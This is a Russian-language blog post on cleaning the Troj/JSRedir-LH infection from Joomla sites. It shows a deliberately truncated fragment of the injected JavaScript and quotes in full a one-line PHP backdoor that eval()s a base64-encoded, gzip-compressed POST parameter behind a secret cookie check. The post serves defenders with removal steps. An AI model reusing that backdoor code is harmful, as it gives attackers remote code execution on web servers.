удаление вируса Troj/JSRedir-LH

Не новый, но все же иногда встречающийся вердикт Troj/JSRedir-LH. В основном появляется у пользователей Joomla. Как понятно из названия самого вердикта (JSRedir), код внедряется в яваскрипты движка, иногда только в какой то один, иногда во все сразу.

Выглядит код так:

/*214afaae*/(function(){
 function stripos (f_haystack, f_needle, f_offset) {
  var haystack = (f_haystack + '').toLowerCase();
  var needle = (f_needle + '').toLowerCase();
  var index = 0;
  if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
  return index;
  }
  return false;
}
 function papirosa(){
 var denyList = ['Chrome'];
 var denyUA = false;
 for (var i in denyList) {
 if (stripos(navigator.userAgent, denyList[i])) {
 denyUA = true;
 break;
 }
 }
 return denyUA;
}
....
})();/*eaa795220*/

* — по соображениям безопасности показана только часть вредоносного кода
Вероятнее всего появление вставки связано с необновленностью самого движка до текущей стабильной версии, а так же модулей/плагинов.

Частично удалить вставку можно простым обновлением движка — скачиваем последнюю стабильную версию с официального сайта, распаковываем (не забудьте удалить папку installation из дистрибутива), подключаемся по фтп к «пациенту» и закачиваем файлы с заменой.
Далее нам в помощь нужен скрипт ай-болит, который покажет остатки неисправленных файлов от модулей. Их тоже желательно обновить.
Так же при таком заражении характерно появление посторонних файлов .php (названия у них — набор букво-цифр, например 37af8c235c.php, 80cc49df.php, bcd2c4b72a.php, e1ac2f.php и любые другие сочетания). Содержимое файлов примерно такое (названия функций могут отличаться):

<?php if(!empty($_COOKIE[* _utma']) and substr($_COOKIE[* _utma'],0,16)== '3469825000034634'){if (!empty($_POST['msg']) and $msg=@gzinflate(@base64 decode(@str_replace(' ','',urldecode($_POST['msg']))))){echo '<textarea id=areatext>';eval($msg);echo '</textarea>bg';exit;}} exit; ?>

Их все необходимо удалить, чтобы избежать повторного заражения. Ай-болит в этом поможет.

Скажите свое мнение

ваш email не публикуется. обязательно *

;-) :yawn: :whew: :toivo: :tmi: :time: :thinking: :talking: :sweating: :swear: :sun: :star: :smoke: :smirk: :sleepy: :skype: :shock: :shake: :rofl: :rain: :punch: :puke: :poolparty: :pizza: :phone: :party: :oops: :nod: :no: :ninja: :neutral: :nerd: :music: :muscle: :mrgreen: :movie: :mooning: :mmm: :middlefinger: :makeup: :mail: :mad: :lol: :lipssealed: :kiss: :itwashtme: :inlove: :idea: :hi: :heidy: :heart: :headbang: :happy: :handshake: :giggle: :fubar: :flower: :evilgrin: :emo: :dull: :drunk: :drink: :doh: :devil: :dance: :cry: :cool: :coffie: :clapping: :cash: :call: :cake: :bug: :brokenheart: :bow: :blush: :beer: :bear: :bandit: :arrow: :angry: :angel: :^) :???: :?: :-| :-o :-P :-D :-) :-( :!:

 

*

code

Этот сайт использует Akismet для борьбы со спамом. Узнайте как обрабатываются ваши данные комментариев.